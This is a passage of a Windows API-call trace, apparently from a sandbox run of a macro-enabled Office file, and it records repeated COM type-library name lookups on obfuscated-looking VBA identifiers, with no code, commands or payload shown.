Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.786] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.786] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.786] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.786] IUnknown:Release (This=0x665ba50) returned 0xd [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.786] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tZZcAA", lHashVal=0x109de2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZZcAA") returned 7 [0068.787] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tZZcAA", lHashVal=0x109de2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZZcAA") returned 7 [0068.787] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tZZcAA", lHashVal=0x109de2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tZZcAA") returned 0x109de2 [0068.787] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tZZcAA" | out: _Dst="tZZcAA") returned 0x0 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tZZcAA") returned 7 [0068.787] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.787] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tZZcAA", lHashVal=0x109de2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.787] IUnknown:Release (This=0x665ba50) returned 0xd [0068.787] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.787] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tZZcAA", lHashVal=0x109de2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.787] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.787] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.787] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tZZcAA", lHashVal=0x109de2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.787] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.787] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.787] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tZZcAA", lHashVal=0x109de2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.787] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tZZcAA") returned 7 [0068.787] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tZZcAA", lHashVal=0x109de2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.787] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.787] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60b2a | out: _Dst=0x67c2d40) returned 0x0 [0068.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tZZcAA") returned 0x10184c [0068.787] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tZZcAA" | out: _Dst="_B_var_tZZcAA") returned 0x0 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tZZcAA") returned 14 [0068.788] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.788] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tZZcAA", lHashVal=0x10184c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.788] IUnknown:Release (This=0x665ba50) returned 0xd [0068.788] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.788] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tZZcAA", lHashVal=0x10184c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.788] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.788] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.788] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tZZcAA", lHashVal=0x10184c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.788] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.788] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.788] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tZZcAA", lHashVal=0x10184c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.788] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.788] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.788] IUnknown:Release (This=0x665ba50) returned 0xd [0068.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc24da, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tZZcAA") returned 14 [0068.788] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tZZcAA", lHashVal=0x10184c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0068.788] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60b2a | out: _Dst=0x144ec0) returned 0x0 [0068.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXCGwCA") returned 8 [0068.788] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NXCGwCA", lHashVal=0x10f92b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXCGwCA") returned 8 [0068.788] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NXCGwCA", lHashVal=0x10f92b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXCGwCA") returned 8 [0068.788] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NXCGwCA", lHashVal=0x10f92b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NXCGwCA") returned 0x10f92b [0068.788] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NXCGwCA" | out: _Dst="NXCGwCA") returned 0x0 [0068.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NXCGwCA") returned 8 [0068.788] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.789] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NXCGwCA", lHashVal=0x10f92b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.789] IUnknown:Release (This=0x665ba50) returned 0xd [0068.789] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.789] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NXCGwCA", lHashVal=0x10f92b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.789] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.789] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.789] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NXCGwCA", lHashVal=0x10f92b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.789] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.789] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.789] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NXCGwCA", lHashVal=0x10f92b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.789] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c22, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NXCGwCA") returned 8 [0068.789] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NXCGwCA", lHashVal=0x10f92b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.789] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.789] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60c22 | out: _Dst=0x67c2d40) returned 0x0 [0068.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NXCGwCA") returned 0x10ed2e [0068.789] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NXCGwCA" | out: _Dst="_B_var_NXCGwCA") returned 0x0 [0068.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NXCGwCA") returned 15 [0068.789] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.789] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NXCGwCA", lHashVal=0x10ed2e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.789] IUnknown:Release (This=0x665ba50) returned 0xd [0068.789] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.789] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NXCGwCA", lHashVal=0x10ed2e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.789] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.789] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.789] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NXCGwCA", lHashVal=0x10ed2e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.789] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.789] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.789] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NXCGwCA", lHashVal=0x10ed2e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.789] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.789] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.789] IUnknown:Release (This=0x665ba50) returned 0xd [0068.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc250a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_NXCGwCA") returned 15 [0068.789] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NXCGwCA", lHashVal=0x10ed2e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x77004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x77004700000000, pDummy=0x0) returned 0x0 [0068.790] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60c22 | out: _Dst=0x144ec0) returned 0x0 [0068.790] ITypeComp:RemoteBind (in: This=0x665ba60, szName="LA1A4_AX", lHashVal=0x10a829, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="LA1A4_AX") returned 9 [0068.790] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="LA1A4_AX", lHashVal=0x10a829, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="LA1A4_AX") returned 9 [0068.790] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LA1A4_AX", lHashVal=0x10a829, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LA1A4_AX") returned 0x10a829 [0068.790] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="LA1A4_AX" | out: _Dst="LA1A4_AX") returned 0x0 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="LA1A4_AX") returned 9 [0068.790] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.790] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="LA1A4_AX", lHashVal=0x10a829, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.790] IUnknown:Release (This=0x665ba50) returned 0xd [0068.790] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.790] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="LA1A4_AX", lHashVal=0x10a829, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.790] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.790] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.790] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="LA1A4_AX", lHashVal=0x10a829, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.790] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.790] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.790] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="LA1A4_AX", lHashVal=0x10a829, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.790] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bf6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="LA1A4_AX") returned 9 [0068.790] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LA1A4_AX", lHashVal=0x10a829, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.790] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.790] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60bf6 | out: _Dst=0x67c2d40) returned 0x0 [0068.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LA1A4_AX") returned 0x107fb2 [0068.790] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_LA1A4_AX" | out: _Dst="_B_var_LA1A4_AX") returned 0x0 [0068.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_LA1A4_AX") returned 16 [0068.790] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.790] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_LA1A4_AX", lHashVal=0x107fb2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.790] IUnknown:Release (This=0x665ba50) returned 0xd [0068.791] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.791] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_LA1A4_AX", lHashVal=0x107fb2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.791] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.791] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.791] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_LA1A4_AX", lHashVal=0x107fb2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.791] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.791] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.791] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_LA1A4_AX", lHashVal=0x107fb2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.791] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.791] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.791] IUnknown:Release (This=0x665ba50) returned 0xd [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc253a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_LA1A4_AX") returned 16 [0068.791] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LA1A4_AX", lHashVal=0x107fb2, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x34004100000000, pDummy=0x0) returned 0x0 [0068.791] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60bf6 | out: _Dst=0x144ec0) returned 0x0 [0068.791] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QA1G_UAZ", lHashVal=0x10154b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QA1G_UAZ") returned 9 [0068.791] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QA1G_UAZ", lHashVal=0x10154b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60c4a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QA1G_UAZ") returned 9 [0068.791] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QA1G_UAZ", lHashVal=0x10154b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.791] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QA1G_UAZ") returned 0x10154b [0068.791] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="QA1G_UAZ" | out: _Dst="QA1G_UAZ") returned 0x0 [0068.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="QA1G_UAZ") returned 9 [0068.791] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.791] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QA1G_UAZ", lHashVal=0x10154b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.791] IUnknown:Release (This=0x665ba50) returned 0xd [0068.791] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.791] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QA1G_UAZ", lHashVal=0x10154b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.791] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.791] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.791] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QA1G_UAZ", lHashVal=0x10154b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.791] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.791] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.791] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QA1G_UAZ", lHashVal=0x10154b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: 